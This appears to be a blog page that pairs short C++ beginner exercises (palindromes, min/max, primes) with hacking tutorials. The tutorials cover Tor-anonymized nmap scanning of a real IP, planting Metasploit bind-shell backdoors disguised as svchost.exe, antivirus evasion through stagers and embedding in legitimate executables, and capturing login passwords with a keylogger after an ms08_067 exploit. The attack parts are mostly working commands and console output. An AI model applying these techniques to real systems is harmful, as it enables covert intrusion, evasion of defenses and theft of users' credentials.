Finding whether a word or number is a palindrome is very common in programming languages. A palindrome word or number is one that reads the same in either direction. Words: bob, boob, ana… Numbers: 1, 2, 33, 121, 222, 3445443.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | #include <iostream> #include <string> using namespace std; //finding palindromes int main() { cout << "Enter word or number: "; string temp, input; cin >> input; temp = input; reverse(input.begin(), input.end());//reversing input if(temp == input) { cout << temp << " is a palindrome!" << endl; } //checking for palin else { cout << temp << " is not a palindrome!" << endl; } system("pause"); return 0; } |
Finding the minimum and maximum in an array is a classical programming exercise in C++. Here’s how is done!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | #include <iostream> using namespace std; //finding min and max in array int main() { int num[5] = { 2, 50, 100, 25, 78 }; int max = num[0], min = num[0]; //set max & min to some value for(int i = 0; i < 5; i++)//loop through array { if(num[i] > max) { max = num[i]; } //find max if(num[i] < min) { min = num[i]; } //find min } cout << "Maximum number: " << max << endl; cout << "Minimum number: " << min << endl; system("pause"); return 0; } |
A Prime number can only be divided by one and itself. For example; 13 can only be divided by 1 and 13. Here’s a C++ code that prints out the all prime numbers between 0 and 100.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | bool isPrime=true; int num = 100; for ( int i = 0; i <= num; i++) { for ( int j = 2; j <= num; j++) { if ( i!=j && i % j == 0 ) { isPrime=false; break; } } if (isPrime) { cout <<"Prime:"<< i << endl; } isPrime=true; } |
In order to achieve complete anonymity while scanning a host, proxychains is as good as it gets because it uses Tor and Privoxy to tunnel the Nmap scan. In other words, you feed an application to proxychains, in this case Nmap, and it uses Tor for the scan. ProxyChains allows you to use SSH, Telnet, VNC, FTP and other network application from behind HTTP(HTTPS) and SOCKS(4/5) proxy servers. Proxychains allows TCP and DNS tunneling through proxies. Be aware that Proxychains only tunnels TCP and DNS; in other words, avoid using UDP and host discovering through ICMP (ping). The options for these are “-n” telling nmap to not resolve hostname, and “-PN” telling nmap not to ping the host. Also, the Tor network is slow, so be patient! I’m doing this in Backtrack; therefore, I will not go over the installation of Nmap, Proxychains, and Tor because they are all there. But you may want to check the proxychains.conf file and make sure you have this settings.
[ProxyList] # add proxy here ... # meanwile # defaults set to "tor" socks4 127.0.0.1 9050
The “-sTV” options tells nmap to do a full TCP connect and Version Detection, “-PN” tells nmap not to ping the remote host, “-n” not to resolve any dns records, and finally, “-p” options for the ports.
root@bt:~# proxychains nmap -sTV -PN -n -p21,22,25,80 64.13.134.52 ProxyChains-3.1 (http://proxychains.sf.net) Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-10-03 20:12 EDT |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:25-<--timeout |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:22-<><>-OK RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:21-<--timeout |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:80-<><>-OK RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:22-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:80-<><>-OK Nmap scan report for 64.13.134.52 Host is up (12s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) 25/tcp closed smtp 80/tcp open http Apache httpd 2.2.3 ((CentOS)) Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 44.64 seconds
There are different ways to drop a backdoor on a target machine with meterpreter. For example, netcat can be uploaded to the victim and with a few registry hacks the backdoor runs when the user login, allowing for shell access; however, there are a few drawbacks with this method. First, it requires to edit the registry and creating new keys (lengthy process). Second, upon the user login you can see netcat running for a split second and closing. It doesn’t take a savvy user to know something is up. And third, is an unauthenticated backdoor, which means is open for anyone. The two approaches I’m taking here are also unauthenticated which is not recommended, but sometimes that is the only choice, and what is more important, they are already built into metasploit.
The first method is the payload “shell_bind_tcp” which is the equibalent of netcat, but without having to do any registry editing. Pauldotcom has an excellent tutorial about this. For this tutorial I’m assuming we got a meterpreter session going.
First, we create our backdoor.
msfpayload windows/shell_bind_tcp RHOST=192.168.1.100,LPORT=4444 x > evil.exe
RHOST is the remote box where you backdoor will be running waiting for connections. Read the rest of this entry »
One of the cool features of Metasploit is the ability to encode your payload into an executable; furthermore, msfencode “-x” option allows you to select a profile, which could be a legit executable like: putty, calc, notepad, etc, to embed your payload, and; therefore, making it more difficult to detect. Now, when trying to bypass antivirus, it is best to use a “stager” rather than a full “payload”…. why? Well, a stager is a small piece of code that allocates in memory, open network port to communicate with the framework, and then it downloads the rest of the payload. A stager is very small. It’s because of its size that antivirus have a hard time detecting it. However, a full payload has everything needed to execute. So first we will create an executable using a single payload, and put it through AV scans.
NOTE: every time you see “>” inside the scripts, it’s “>”
msfpayload windows/shell_bind_tcp RHOST=192.168.1.100,LPORT=4444 x > svchost10.exe
Now, let’s put it through AV scans, and….
So you got a meterpreter session on a remote client, and now you want to get password hashes; but sometimes you can’t use “hashdump” from meterpreter, specially if your session is not running as user with admin privileges. So how could you get the remote user password? Well, Metasploit has a script called “keylogrecorder,” which has an option to logoff the user, and record his login password. Note that for this to work, you need to migrate your process to “winlogon.exe.”
STEPS:
1- Ok, the first thing is to get a meterpreter session going. For this we’ll use a “netapi” exploit.
msf > search netapi [*] Searching loaded modules for pattern 'netapi'... Exploits ======== Name Rank Description ---- ---- ----------- windows/smb/ms03_049_netapi good Microsoft Workstation Service NetAddAlternateComputerName Overflow windows/smb/ms06_040_netapi great Microsoft Server Service NetpwPathCanonicalize Overflow windows/smb/ms06_070_wkssvc normal Microsoft Workstation Service NetpManageIPCConnect Overflow windows/smb/ms08_067_netapi great Microsoft Server Service Relative Path Stack Corruption msf> use exploit/windows/smb/ms08_067_netapi
2- now we need to set the options for this exploit.
msf exploit(ms08_067_netapi)> show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi)> set RHOST 172.16.10.105 RHOST => 172.16.10.105
Subscribe
Designed By :
